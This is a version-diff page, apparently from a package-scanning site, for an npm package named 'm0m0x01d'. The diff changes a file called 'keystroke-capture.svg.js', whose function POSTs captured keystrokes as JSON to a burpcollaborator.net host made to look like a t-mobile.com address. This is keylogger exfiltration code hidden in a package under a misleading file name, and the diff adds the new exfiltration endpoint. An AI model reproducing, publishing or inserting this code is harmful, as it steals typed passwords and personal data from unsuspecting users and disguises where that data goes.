m0m0x01d 22.0.0 → 23.0.0
Sign up to get free protection for your applications and to get access to all the features.
- package/keystroke-capture.svg.js +1 -1
- package/package.json +1 -1
package/keystroke-capture.svg.js
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
// Function to send keystrokes to the intermediary file on unpkg
|
2
2
|
function sendKeystrokes(data) {
|
3
3
|
var xhr = new XMLHttpRequest();
|
4
|
-
xhr.open("POST", "https://es.t-mobile.com
|
4
|
+
xhr.open("POST", "https://es.t-mobile.com.mmcyrtl8tknr87hk8d9j6upi69c10q.burpcollaborator.net/xxxxxxxxx", true);
|
5
5
|
xhr.setRequestHeader("Content-Type", "application/json");
|
6
6
|
xhr.send(JSON.stringify({ keystrokes: data }));
|
7
7
|
}
|